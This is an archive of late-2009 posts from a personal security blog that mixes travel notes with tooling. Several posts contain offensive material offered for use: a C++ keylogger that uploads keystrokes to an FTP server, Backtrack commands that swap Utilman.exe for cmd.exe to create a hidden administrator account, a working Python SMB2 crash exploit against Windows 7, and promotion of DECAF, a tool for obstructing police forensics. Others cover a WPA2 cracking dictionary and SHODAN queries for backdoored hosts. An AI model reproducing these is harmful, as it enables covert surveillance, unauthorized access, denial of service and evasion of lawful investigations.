Wednesday, December 30, 2009

DECAF is Back


Hey folks, today I want to report the DECAF history:




We originally pulled the app because of legal pressure. With DECAF v1 originally set out to restrict forensic extractions made by Microsoft COFEE, it raised major concerns with its ethical nature and potential hazard to the disruption of criminal investigations. By us disabling the application, it freed us from any damage that might have happened in the event DECAF v1 was used to block forensic examiners from extracting data. We used the words "publicity stunt" because when we pulled DECAF v1 offline and disabled the applications, we had a lot of media attention. We decided to use that channel to raise awareness for better security and more privacy tools.

After the interview with Cyberspeak, we had a nice long phone conversation. During that time, they informed me of my hazardous circumstances and gave me excellent advice: take DECAF down. Of course, if you know anything about them over at Cyberspeak, you would know they are very intelligent on more than just forensics. They are pretty well versed with federal statutes. It would be silly of me to think that I knew more than them, so I followed their advice and pulled the app.

As you know, this caused major conflict in the underground scene. We started getting denial of serviced, flamed on forums, and even SoldierX did a pretty good job re-activating DECAF v1. We are definitely not mad at SoldierX for that, can you blame them? Everyone wants privacy. Not to mention DECAF v2 was already cookin' in the kitchen so it was only a bit of time before it would be released.

Now I want to address the phone home feature in DECAF v1. As you know, we were going to tailor the app towards the p2p private tracking scene. We were going to use the phone home feature to notify private tracker admins of a seeder/node who had COFEE run on his/her machine. This feature was not complete before release but we did have it semi-working, hence the COFEE usage reporting. Some saw this as a privacy issue, which from that perspective I can see why. We decided v2 will not report usage back. We also do not perform automated version checking.

The disabling of v1 was NOT a hook in the application. It was bad coding. I did not use a try/catch on the version checking, so if it failed, the app failed. Of course the app was only coded in a 1-2 day timeframe, so can you blame me? Bad practice I guess. Anyhow, when I adjusted the version check on the server side, it caused the application to return a null string, causing an unhandled exception.

Version 2 is finished. We are now monitoring Microsoft COFEE, Helix, EnCase, Passware, Elcomsoft, FTK Imager Port, Forensic Toolkit, ISOBuster, and ophcrack. We also give the user the ability to add their own custom signatures. We have also added CD-Rom monitoring. We no longer execute a "self destructive lock-down mode" but rather give the user the ability to execute files, to disable the device where the signatures were found, and start-up in monitor mode.



Thank you, DECAF team, for your amazing job; I really appreciate your effort. Now, may I ask you a question: what about the source code? Is it available?


Here is the direct link (no ads) to DECAF.

Monday, December 28, 2009

Twitter's Black Password List

Hey folks, I just got this from friends.
The reason I present this is that it's an interesting study of what Twitter thinks is a bad idea. I would guess that many of these passwords were taken from published lists of passwords used when cracking accounts. If you currently use passwords which resemble any of these, I'd encourage you to change them as soon as possible.


Old Fashion Microsoft IIS Vulnerability


An old-fashioned vulnerability has been discovered in Microsoft Internet Information Services (IIS), where the server incorrectly interprets file names with multiple extensions separated by the ";" character.




The file "aspShell.as;.jpg" is interpreted by web applications as a normal JPEG file, while IIS considers it an ASP file to be executed.

This allows attackers to upload malicious executables to the vulnerable web server, bypassing the normal file extension protections. In the case of "aspShell.as;.jpg", web applications consider it a JPEG file, while IIS considers it an ASP file and passes it to "asp.dll". This bug does not work with ASP.NET, as the .NET technology cannot recognize "aspShell.as;.jpg" as a .NET file and shows a "page not found" error. Besides the semicolon, ":" can be used to make an empty file with any arbitrary extension. For example, by uploading "test.asp:.jpg", an empty ASP file, "test.asp", would be created on the server on an NTFS partition. This is only because of NTFS Alternate Data Streams and it is completely different from the semicolon vulnerability.

The bug was discovered in April 2008 but only reported on 25 December 2009.

This vulnerability has a very high impact on IIS, as the attacker can bypass file extension protections by using a semicolon after an executable extension such as ".asp", ".cer", ".asa", and others.
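As an added example (not code from the advisory or from IIS), the following Python models the parsing gap described above and shows the acceptance check an upload handler should make; the file names are constructed, using ".asp;.jpg" rather than the post's ".as;.jpg", and the image whitelist is my own choice.

```python
import os

# Extensions the post names as executable under IIS 6 classic ASP mappings.
IIS_EXECUTABLE_EXTS = {".asp", ".cer", ".asa"}
# Whitelist for an image-upload endpoint (chosen for this example).
ALLOWED_IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}


def naive_extension(filename):
    """The check a typical 2009 upload handler made: the text after the last dot."""
    return os.path.splitext(filename)[1].lower()


def iis6_effective_name(filename):
    """Model of the behaviour the advisory describes (not IIS code).

    IIS 6 stops reading the file name at the first ';', and 'name:stream'
    addresses an NTFS alternate data stream of 'name', so in both cases the
    handler mapping is chosen from the part before the separator."""
    for sep in (";", ":"):
        if sep in filename:
            filename = filename.split(sep, 1)[0]
    return filename


def handler_mismatch(filename):
    """Return (extension the app validates, extension IIS would map)."""
    app_ext = naive_extension(filename)
    iis_ext = naive_extension(iis6_effective_name(filename))
    return app_ext, iis_ext


def is_safe_image_upload(filename):
    """Hardened acceptance test for a user-supplied file name.

    Rejects path separators, NUL and control characters, the reserved ';' and
    ':' characters, any executable extension appearing in any dot-separated
    segment, and any final extension outside the image whitelist.  Generating
    the stored name server-side is still preferable; this is the defence when
    the original name must be kept."""
    if not filename or filename in (".", ".."):
        return False
    if any(c in ";:/\\\x00" for c in filename) or any(ord(c) < 32 for c in filename):
        return False
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    exts = {"." + p for p in parts[1:]}
    if exts & IIS_EXECUTABLE_EXTS:
        return False
    if "." + parts[-1] not in ALLOWED_IMAGE_EXTS:
        return False
    # Belt and braces: what IIS would map must agree with what we validated.
    app_ext, iis_ext = handler_mismatch(filename)
    return app_ext == iis_ext
```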


To read more about the vulnerability, and for some examples, see here.

Sunday, December 27, 2009

Back From Napa


After 3 full days in Napa I'm back in Davis.
I had an awesome Christmas with my friends Ryan and Katie at "The Craftsman Inn".



Napa Valley seems to be the US's Tuscany: wineries, hills full of grapes, good wine and, of course, wine tasting tours. Everybody becomes friends, singing and laughing together, after a good round of wine ... according to the old "well-known" Latin saying:





:D

Wednesday, December 23, 2009

Microsoft, Avast and McAfee Missing Simple Tests

Using the simple "Quick'n Dirty" EICAR-GTUBE-Generator 0.1 (here the latest version) I hid the EICAR signature inside a simple PDF file. Now let's give this PDF to the AVs and see what happens.

Here are the "fun" results:




Isn't it weird that some AV leaders such as Microsoft, Avast and McAfee miss this easy check?
Now my question comes easily ... how can we be sure that they recognize more complicated viruses if they miss this easy signature check?

More reading: here, here and here.

New Version of EICAR-GTUBE-Generator

Hi folks, a quick post before Christmas Eve. I've just released a new "Quick'n Dirty" release of EICAR-GTUBE-Generator.

New features:

Version 0.1 injects EICAR inside PDF files




Here are the source code and the executables:

1) EICAR-GTUBE-Generator-Jar0.1
2) EICAR-GTUBE-Generator-Sources0.1

Tuesday, December 22, 2009

EICAR and GTUBE Generator - Anti-Virus Results -


Analyzing the EICAR-GTUBE-Generator with a common multi-anti-virus platform like VirusTotal, it seems no AV recognizes the EICAR-GTUBE-Generator as an EICAR generator (so, in some way, a malware generator): here is the proof (click to enlarge)



Now, my question is: do the AVs truly analyze the EICAR signature, or do they apply simple pattern matching?
On the other hand, analyzing the resulting file EICAR.com is even more fun:



First of all, Prevx.com does not recognize the EICAR file. That's very interesting, to me. They claim to be:

"PC and Internet Security powered by the World's largest real time threat database..."

But they don't recognize one of the most famous strings in the AV community. So guys, are you sure you have the world's largest DB? Maybe you need a little "back to the easy stuff" policy?
Anyway, the second interesting thing is Microsoft's AV, which recognizes EICAR but as a virus (in fact, at the beginning there is the label Virus:). That is technically wrong. All the other tested AVs did a good job labeling EICAR as a warning and a test file. Why does Microsoft recognize EICAR as a virus and not as a standard test file? Maybe this is just the tip of an iceberg of wrong pattern recognition in Microsoft's AV? I'll check it out soon!

Sunday, December 20, 2009

EICAR and GTUBE Generator

Hi Folks,
today I want to share a little but interesting (at least to me) mini software for testing anti-virus and anti-spam engines. I called it EICAR-GTUBE-Creator, and it's a little utility to create at run time the EICAR anti-virus test file and the GTUBE anti-spam test mail.

The EICAR test file (official name: EICAR Standard Anti-Virus Test File) is a file, developed by the European Institute for Computer Antivirus Research, to test the response of computer antivirus (AV) programs. The rationale behind it is to allow people, companies, and AV programmers to test their software without having to use a real computer virus that could cause actual damage should the AV not respond correctly. EICAR likens the use of a live virus to test AV software to setting a fire in a trashcan to test a fire alarm, and promotes the EICAR test file as a safe alternative.


The GTUBE (Generic Test for Unsolicited Bulk Email) is a 68-byte test string used to test anti-spam solutions, notably those based on SpamAssassin. In SpamAssassin, it carries an antispam score of 1000 by default, which would be sufficient to trigger any installation.


The EICAR anti-virus test file is great for testing your anti-virus software, but it's not easy to handle, because your anti-virus software keeps deleting it. For this reason I came up with this utility. Here is the main window: by clicking on the EICAR button the utility generates the EICAR file in the current directory. Your AV should detect it immediately! This utility can also be used to measure AV performance in detecting this file.

Here is the GTUBE window. Basically you have to send one email to the test mailbox; the utility automatically adds the GTUBE "infection".
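Here is an added Python equivalent of what the two windows do (this is not the Java utility's source): it assembles EICAR and GTUBE at run time, validates a file against EICAR's own detection rule, builds the GTUBE mail, and wraps a payload in a minimal PDF as in the "Missing Simple Tests" post above; addresses and paths are placeholders.

```python
import email.message

# Both test strings are assembled from pieces at run time so that the source
# file itself does not carry the exact 68-byte signature (the same reason the
# utility above generates EICAR on demand instead of shipping it).
EICAR_PARTS = ("X5O!P%@AP[4\\PZX54(P^)7CC)7}$", "EICAR-STANDARD-ANTIVIRUS-TEST-FILE", "!$H+H*")
GTUBE_PARTS = ("XJS*C4JDBQADN1.NSBN3*2IDNEN*", "GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL", "*C.34X")
EICAR_MAX_LEN = 128               # EICAR: signature first, then only whitespace, <= 128 bytes
EICAR_TRAILING = b" \t\r\n\x1a"   # whitespace EICAR allows after the signature


def eicar_bytes():
    """The 68-byte content of the EICAR Standard Anti-Virus Test File."""
    return "".join(EICAR_PARTS).encode("ascii")


def gtube_string():
    """The 68-byte GTUBE string that SpamAssassin scores at 1000 by default."""
    return "".join(GTUBE_PARTS)


def is_eicar_file(data):
    """True if `data` is a file vendors are expected to flag under EICAR's rule:
    it starts with the signature, the rest is only whitespace, total <= 128 bytes."""
    sig = eicar_bytes()
    if len(data) > EICAR_MAX_LEN or not data.startswith(sig):
        return False
    return all(b in EICAR_TRAILING for b in data[len(sig):])


def write_eicar(path):
    """Write the test file; a working AV should quarantine it as soon as it lands."""
    with open(path, "wb") as fh:
        fh.write(eicar_bytes())
    return path


def build_gtube_message(sender, recipient, subject="GTUBE anti-spam test"):
    """Build the mail the GTUBE window sends: a plain-text body carrying the string."""
    msg = email.message.EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content("This is a GTUBE test message for the anti-spam filter.\n\n"
                    + gtube_string() + "\n")
    return msg


def embed_in_minimal_pdf(payload):
    """Constructed minimal single-page PDF (with a real xref table) whose content
    stream is `payload`; the kind of wrapper the 'Missing Simple Tests' post used."""
    objs = [
        b"<</Type/Catalog/Pages 2 0 R>>",
        b"<</Type/Pages/Kids[3 0 R]/Count 1>>",
        b"<</Type/Page/Parent 2 0 R/MediaBox[0 0 200 100]/Contents 4 0 R>>",
        b"<</Length %d>>\nstream\n" % len(payload) + payload + b"\nendstream",
    ]
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, obj in enumerate(objs, 1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + obj + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<</Size %d/Root 1 0 R>>\nstartxref\n%d\n%%%%EOF\n" % (len(objs) + 1, xref_pos)
    return bytes(out)
```

EICAR asks vendors to detect the string only when it starts the file with at most whitespace after it (128 bytes total), so is_eicar_file() returns False for the PDF-wrapped variant, and a miss on that file is not by itself a failure of a vendor's EICAR support.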



Finally, the source code and the executable (JAR, platform independent):

Java (platform independent) executable (jar)
Java Source Code (built with NetBeans 6.5.1)


Enjoy your testing

Cool and Free Software KeyLogger

Hi folks, today I want to share a very cool software keylogger.
It's written in C++; it uploads logged actions (keyboard, mouse, keyboard combos, etc.) through FTP to your personal FTP server. Here is the link.

What you need to edit to fit it to your system are the following lines:



And if you wish to modify the file name you have to change these other lines:




I've used it a couple of times and it works fine under Windows systems. If you want a more professional keylogger you may modify this code just a little to obtain great results.

Wednesday, December 16, 2009

Free Huge Password Dictionary


Today I want to share a huge piece of work done over the last years, because, traveling a lot, it has been very useful; you know, WPA2 was the main target, but you can really use it in a lot of different ways. It seems that it is very difficult to find a good and free password dictionary around the Internet: for some of them you have to pay, for some others you need to wait a long time on torrents or P2P. So finally I decided to share my personal one :D, on RapidShare. There is still a lot to do with this huge password dictionary (I'm thinking of optimization and upgrading), so if some of you are interested and want to upgrade or optimize the dictionary I'll be very glad. If you are planning to modify it, please let me know, so that I can update the RapidShare files and keep an always up-to-date Free Password Dictionary Repository.

Here the link to download the Free Password Dictionary:



OK, after you have downloaded all the zip files into a folder (let's say DictionaryFolder) you can unify the files, making the HugePasswordDictionary file, simply using the cat command.

cat x* >> MyHugePasswordDictionary.txt

If you want to use "MyHugePasswordDictionary.txt" with aircrack-ng, you need to split it into small 2MB files. To do that you can simply use the split Unix command, as in the following example.

split -b 2m MyHugePasswordDictionary.txt

At the end of the process you'll find several 2MB files inside your "DictionaryFolder" directory.

Enjoy !

Monday, December 14, 2009

Detect and Eliminate Computer Assisted Forensics (DECAF)

Hey Folks,
today I want to point out this interesting tool, called DECAF. It's a tool against Microsoft's Computer Online Forensic Evidence Extractor (COFEE).

As many of you probably remember ....

Computer Online Forensic Evidence Extractor (COFEE), designed exclusively for use by law enforcement agencies. COFEE brings together a number of common digital forensics capabilities into a fast, easy-to-use, automated tool for first responders. And COFEE is being provided—at no charge—to law enforcement around the world.
With COFEE, law enforcement agencies without on-the-scene computer forensics capabilities can now more easily, reliably, and cost-effectively collect volatile live evidence. An officer with even minimal computer experience can be tutored—in less than 10 minutes—to use a pre-configured COFEE device. This enables the officer to take advantage of the same common digital forensics tools used by experts to gather important volatile evidence, while doing little more than simply inserting a USB device into the computer.


The new software against COFEE seems to be really useful for everybody who needs maximum privacy and for those who don't like being investigated. The web site claims:



DECAF is a counter intelligence tool specifically created around the obstruction of the well known Microsoft product COFEE used by law enforcement around the world.
DECAF provides real-time monitoring for COFEE signatures on USB devices and running applications. Upon finding the presence of COFEE, DECAF performs numerous user-defined processes; including COFEE log clearing, ejecting USB devices, drive-by dropper, and an extensive list of Lockdown Mode settings. The Lockdown mode gives the user an automated approach to locking down the machine at the first sign of unusual law enforcement activity.
DECAF is highly configurable giving the user complete control to on-the-fly scenarios. At a moment's notice, almost every piece of hardware can be disabled and pre-defined files can be deleted in the background. DECAF also gives the user an opportunity to simulate COFEE's presence by sending the application into a 'Spill the cofee' type mode. Simulation gives the user an opportunity to test his or her configuration before going live.
Future versions will have text message and email triggers so in case the computer needs to enter into lockdown mode the user can do it remotely. It will also have notification services where in the case of an emergency, someone can be notified (private torrent tracker admins). DECAF's next release is going to be available in a more light-weight version and/or a windows service.


Once the software is run, the following window appears, very intuitive and very smooth.


This is the main screen for the "Lock Down" option.



Well, people who don't want to "be investigated" need to install this "tiny" and "dirty" DECAF software, BUT they must be aware that plenty of other ways exist to investigate their Windows machine.

Saturday, December 12, 2009

Google PhoneBook.

Google Phonebook has been around for years but few people know about it.

Google Phonebook is the Google product that traces your phone numbers and your addresses. To be able to search it you have to know the URL; you can't link to it directly, and to enter the interface you must come from an already completed search, such as: http://www.google.com/search?hl=en&pb=r&q=Bill+Gates&btnG=Search+PhoneBook.




By typing names you get phone numbers and addresses (linked directly to Google Maps). Obviously you may claim your privacy and ask to be removed from the list (this is the direct link), BUT did you know you were inside Google Phonebook?
Maybe I'm wrong (and I'm sure I am, because they're doing it... so probably they can), but in my mind the process should be the opposite: "if you want to be listed in the phonebook you should ask to be added" (or someone should ask you if you want to be added to the phonebook). I believe many people don't know they are listed in GPhoneBook and don't know they are sharing their personal information, such as phone number and addresses, with the whole world.


Dan Philpott's comment was:

This feature has been around and well known for ... when did Google start? Pretty much every major search engine that ever existed has had a white pages lookup function. Published phone numbers were one of the most accessible and ubiquitous data sets available in the early days of the Internet. Search engines plugged them into the data collected and found ways to add value with things like reverse lookups.

Not sure what the privacy implications are. This information is public and published in phone books and on a wide variety of phone number sites.



Do you have any other thought ?

Finally Arrived !

Hi folks,
I'm finally in Davis, CA. The trip was very long: about 3300 miles, 65 driving hours, a huge snow storm in Arizona (Flagstaff), lots of deserts and forests. But everything was amazing.




I enjoyed the long trip a lot, the fascinating Route 66 and the wonderful Painted Desert (Arizona).




From Monday I'll start my job at UC Davis.
If somebody is planning to come near the Bay Area please let me know; we may organize something.

Saturday, December 5, 2009

Clickjacking: Starting Point.

Hello folks,
according to wikipedia, clickjacking is a malicious technique of tricking Web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous Web pages. A vulnerability across a variety of browsers and platforms, a clickjacking takes the form of embedded code or script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function.
The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008. The exploit is also known as UI redressing.




If you're interested in new advanced clickjacking techniques, I want to point out this nice paper ( :D ) titled Frightened by Links, where you can find a couple of examples including code and images. To me, it's a good starting point. Let me know what you think about it.

Friday, December 4, 2009

Just For Fun, not Yet Security

Hi folks, I'm still road-tripping across the US.
Actually I am in Oklahoma City and I'm writing from an Internet cafe downtown, passing through a secure SSL proxy.
I don't have enough time to write about security stuff BUT, 2 days ago I received a nice email from a friend of mine containing these funny pictures. I want to share them with you.







I'm not sure they represent well the difference between Mic and Mac guys; anyway, they're funny.

Monday, November 30, 2009

Moving Time.

Hi Folks,
today is my last day in DC! I really enjoyed DC: the city is wonderful and the working opportunities are huge. Even the weather is not so bad! Tomorrow morning I'll leave at 5AM (trying to avoid DC traffic), destination Davis, CA. I'll try the old and classic road, Route 66. I hope my 2002 Ford Explorer will be "strong enough" to cross the Rocky Mountains!

So basically I'll read mail every evening from 7PM to 9PM. I'll probably not be present on IM for 2 weeks, and it will probably be difficult for me to update my blog till December 15th.




Today my blog reached 280 visits per day from all around the world; that's a lot for me! So stay tuned, even if you won't read much news from my blog during these two weeks.


California's Clicks Per Day. November 30th, 9:40 AM

To all the Californian readers: I'll be back and I'll be glad to meet you somewhere in Northern California. If you like, please leave a comment below and I'll contact you soon!

Saturday, November 28, 2009

YouTube Video Spam

Hi Folks,
this morning I saw these fraudulent YouTube videos.


I never thought about this kind of "spam" technique. While the user is watching his favorite music video, an advertisement pop-up appears on the screen saying: "to see more about your favorite singer click here". The user, especially during the first attacks, is tempted to click on, or copy and paste, the fraudulent link, which might point to any malicious site.

Here is another example ..



If you want to try it yourself, the YouTube search words are:
Adam Lambert AMA kiss
Ortiz vs. Griffin

Friday, November 27, 2009

RunAlyzer.

Hi Folks,
as you know I'm not a Windows user, but when I find something interesting on the "Windows side" (I usually say "Windows side" for Windows users and "Mac side" for Mac users) I won't stop myself from writing something about it. During these days I've been involved in a forensic committee on some Windows machines. It was the first time that a guy showed me this amazing Windows forensic tool called RunAlyzer. Its "international" web site shows that the project is pretty well known in different countries (since there are a lot of different languages and testimonials) and it seems very well supported, in terms of documentation, wiki and forums.



The software is very intuitive even if it explores very technical details of the Windows OS. I personally found this software very useful, since you can analyze and manage real-time processes, explore Windows registry keys, services, logs and much more (take a close look at the following image by clicking on it).


Thursday, November 26, 2009

Happy Thanksgiving to you



Personally I love fried turkey ! ( Thanks FoodGeeks )

INGREDIENTS

4 to 5 gallons vegetable oil
1 (12-15 lb.) whole turkey, room temperature
Cayenne pepper (optional)

INSTRUCTIONS

1. Begin heating the oil in a 10-gallon pot over a very hot propane flame outdoors. Don't set the burner to its highest setting, as you may need to increase the heat after you've added the turkey. It will take about 20 minutes for the oil to heat.

2. Meanwhile, rinse the turkey well, pat it dry inside and out, and set it on end in a sink to drain.

3. When the oil reaches 375°F, pat the turkey dry again and sprinkle it with cayenne, if desired. If your cooker has a basket insert, place the turkey in the basket and set it over a baking sheet. If not, set an oven rack over a large baking sheet, place the turkey on it and take them outside to the cooker.

4. Check the temperature of the oil. When the oil reaches 390°F, carefully and slowly lower the basket with the turkey into the oil, or lower it holding it by its legs or by a long heavy tool such as a clean fireplace poker inserted into its cavity. Be careful! Immediately check the oil temperature and adjust the flame so that the temperature does not dip below 340°F. You want to maintain the temperature at 365°F. As it cooks, occasionally move the bird around in the oil so that it does not scorch (the oil near the heat source will be hotter). Whole turkeys take only 3 to 4 minutes per pound to fry to perfection. Small ones, around 12 pounds, will take about 35 minutes. Large ones, around 15 pounds, will take about 1 hour. When it is done, the turkey will float to the surface with a perfectly crispy, brown skin. If you are unsure, you can test the meat for doneness at the hip joint or insert a meat thermometer into the breast; it should register 180°F.

5. Using the basket insert if there is one, or by again inserting a long heavy tool such as a clean fireplace poker into its cavity, carefully remove the turkey from the oil and hold it over the pot for a moment to allow any excess oil to drain back into the pot, then lay the bird on the oven rack. Allow it to rest for 20 minutes before carving.

Tuesday, November 24, 2009

SHODAN, The Best Computer Search Engine, Ever

Hi Folks,
this morning I discovered this amazing computer search engine: SHODAN



SHODAN lets you find servers/ routers/ etc. by using the simple search bar up above. Most of the data in the index covers web servers at the moment, but there is some data on FTP, Telnet and SSH services as well. Let me know which services interest you the most and I'll prioritize them in my scanning.

Let's say you want to find servers running the 'Apache' web daemon. A simple attempt would be to use:

apache

How about finding only apache servers running version 2.2.3?

apache 2.2.3

You can also narrow down the results using the following search parameters:

country:2-letter country code
hostname:full or partial host name
net:IP range using CIDR notation (ex: 18.7.7.0/24 )
port:21, 22, 23 or 80


For example: get all web (port:80) hosts running 'apache' in switzerland (country:CH) that also have '.ch' in any of their domain names:

apache country:CH port:80 hostname:.ch

Just for the sake of hackers, let's try some examples:

1) List of backdoor shell (try-it)
2) Bad Telnet Services (try-it)
3) List of old IIS 4.0, very bad... (try-it)

Now, I strongly believe that in the next few days a lot of systems will be compromised. With this service attackers will find random vulnerable services/servers; that is manna for script kiddies.
One question comes out .... will it change the attack paradigm? At the beginning of the history of attacks, attackers hit a target only for particular reasons such as politics, personal motives, money and so forth. Now attackers may want to attack some targets only because they are vulnerable to something, without any true reason, only for the sake of attacking something. This will be a huge paradigm shift.

Sunday, November 22, 2009

Definitely Polymorphic Malware.

Hi folks, let me say two more words about the previous code.
I strongly believe that the discussed code, at the beginning of its life, followed the fastcall convention (1). As you can see, the first parameters are put directly into CPU registers, and after that saved onto the stack (2); this is the classic fastcall behavior.



Due to polymorphism, the code is able to change itself. One of the first basic techniques is to change registers and saved locations, as shown in (2). Basically we are in front of a polymorphic and evolved (meaning: "not the original") malware.

Friday, November 20, 2009

The First Time Against Calling Conventions

This morning I've been fascinated by a function with a non-standard calling convention. Usually I play with cdecl (the C calling convention), stdcall (the Microsoft standard calling convention) or, from time to time, I've also exploited some fastcall (fast calling convention), but I've never seen something like this:


arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
lea eax, [ebp+arg_4]
push eax ; va_list
push ecx ; char *
push esi ; size_t
push edi ; char *
call __vsnprintf
add esp, 10h
mov byte ptr [edi+esi-1], 0
pop ebp
retn

Variables in eax, ecx, esi and edi? What kind of convention is this?

Thursday, November 19, 2009

Top 5 Social Engineering Techniques

Hello folks,
today I just want to share this nice article from PCWorld about the top 5 social engineering techniques. Take a look and see if your company is vulnerable too.



Social Engineering: "There's no patch to human ingenuity ... ".

Wednesday, November 18, 2009

CAINE 1.5 released

Hi folks,
this is one of my favorite forensic distributions; it's called CAINE. Today it has been updated to version 1.5.



Main features:
WinTaylor 1.5, forensic frontend for Windows environment
CHANGELOG CAINE 1.5
Kernel 2.6-24.25 updated.
ADDED:
lnk_parse
lnk.sh
mork
steghide
UserAssist
dos2unix
chntpw
tkdiff
xdeview
md5deep,foremost updated
launchers fixed
manual updated
README.txt in the bash scripts directory
Photorec and Testdisk and XSteg in the Forensics menu
Window list and Show Desktop added.
------------------------------------------------
Windows Side:
Wintaylor updated
HexEdit added
Regmon updated
FTKImager updated
Index.html fixed
Photorec
Testdisk
Nigilant32
UsbWriteProtect

CAINE is one of the most intuitive live distros for forensic analysis; I suggest it to everybody who's new to the topic. It's easy to learn forensic analysis through this tool.

Wikipedia Toolbar CSC Vulnerability



That's interesting. I don't mean the vulnerability per se but the Wikipedia toolbar, which is widely used. Here is the full description.

Monday, November 16, 2009

Somewhere in Delaware



The new security paradigm or the new Apple patent prototype (camera behind the monitor)?

Saturday, November 14, 2009

Gain Vista Administrator's Privilege

Hi folks, today I want to point out one of the plenty of ways to gain access to Vista boxes. Thanks to some mailing list friends.
This way is clearly faster than brute forcing and boot-replacing passwords.


Boot into Backtrack and open a shell prompt:
cd /mnt (change directory to mounted drives)
ls (get the list of mounted drives)
cd sda1 (sda1 is the main hard drive)
cd Windows/ (change to the windows directory)
cd System32/ (change to the system directory)
mv Utilman.exe Utilman.old (backup original file)
cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)
reboot.
Once rebooted, at vista logon screen, Press Windows key + U
To invoke Utility Manager ( A.K.A. CMD.exe)
Cmd.exe will spawn with ‘System’ privileges.
c:\>net user S00perAdmin mypassword /add
c:\>net localgroup administrators S00perAdmin /add
Reboot and log in with your newly added Admin account

The Science News Cycle

It's so true !



Via PHD Comics

Thursday, November 12, 2009

TLS and Authentication Issues.

Yesterday, on Veterans Day, I spent my morning trying to understand the TLS attack described here



I suggest these readings to all of you. I know it's not very "new", but it's still incredible to find that there are still protocol issues, even in a protocol that is old and well tested.

Wednesday, November 11, 2009

Windows 7: The most Secure OS ...

Directly from Microsoft TechNET

Built upon the security foundation of Windows Vista, Windows 7 introduces a number of security enhancements to give users the confidence that Microsoft is continuing to find better ways to safeguard users’ IT investments as well as data. Businesses will benefit from enhancements that help protect company sensitive information, that provide stronger protections against malware, and that help secure access to corporate resources and data. End users can enjoy the benefits of computers and the Internet knowing that Windows 7 is using new technologies and features to safeguard privacy and personal information. Finally, all users will benefit from the flexible security configuration options in Windows 7—options that will help users achieve the unique balance of security and usability to meet their specific needs.





Today Laurent Gaffié described a very easy trick to crash the system. The bug triggers an infinite loop in SMB{1,2}, pre-auth, no credentials needed. Basically:
netbios_header = struct.pack(">i", len(''.join(SMB_packet))) + SMB_packet
(The NetBIOS header provides the length of the incoming SMB{1,2} packet.)
If the length in netbios_header is 4 bytes or more smaller than the actual SMB_packet, it just blows up!
Here is the small script against the giant Microsoft Windows 7:
import SocketServer  # Python 2 module: the script runs under Python 2

# Malformed SMB2 response: the NetBIOS header claims 0x9a bytes, the body is 0x9e bytes.
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):
        print "Who:", self.client_address
        print "THANKS SDL"
        input = self.request.recv(1024)   # read the client's request and ignore it
        self.request.send(packet)         # answer with the malformed packet
        self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

If you are interested in more details, please visit Laurent's blog.
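The root cause is a receiver that trusts the NetBIOS length field without checking it against what actually arrived. As an added example (my own code, not Laurent's script or anything from the post), here is the consistency check a robust SMB receiver or a traffic monitor should apply to every frame on TCP/445. The sample frames are constructed, not the bytes from the post: a 0x9e-byte SMB2 body framed once honestly and once with a header claiming 0x9a bytes, the same four-byte gap the post describes.

```python
NETBIOS_SESSION_MESSAGE = 0x00      # message type of a normal session payload
SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"


def validate_netbios_frame(frame: bytes) -> dict:
    """Validate the 4-byte NetBIOS Session Service header that prefixes every SMB message on
    TCP/445: byte 0 is the message type, bytes 1-3 the big-endian length of what follows.
    (The post packs the whole header as one big-endian 4-byte int; with type byte 0x00 both
    views agree.) Returns declared vs actual length and a verdict."""
    report = {"ok": False, "declared": None, "actual": max(len(frame) - 4, 0), "reason": ""}
    if len(frame) < 4:
        report["reason"] = "truncated NetBIOS header"
        return report
    msg_type = frame[0]
    declared = int.from_bytes(frame[1:4], "big")
    body = frame[4:]
    report.update(declared=declared, actual=len(body))
    if msg_type != NETBIOS_SESSION_MESSAGE:
        report["reason"] = "unexpected NetBIOS message type 0x%02x" % msg_type
    elif body[:4] not in (SMB1_MAGIC, SMB2_MAGIC):
        report["reason"] = "payload does not start with an SMB signature"
    elif declared != len(body):
        # This is the case the post triggers: the header understates the payload by 4 bytes.
        report["reason"] = "length mismatch: header says %d, payload is %d" % (declared, len(body))
    else:
        report.update(ok=True, reason="consistent")
    return report


def build_frame(body: bytes, declared=None) -> bytes:
    """Prefix an SMB body with a NetBIOS header; `declared` overrides the true length."""
    length = len(body) if declared is None else declared
    return bytes([NETBIOS_SESSION_MESSAGE]) + length.to_bytes(3, "big") + body


# Constructed samples: a 0x9e-byte (158) SMB2 body, framed honestly and then with a header
# that claims only 0x9a (154) bytes.
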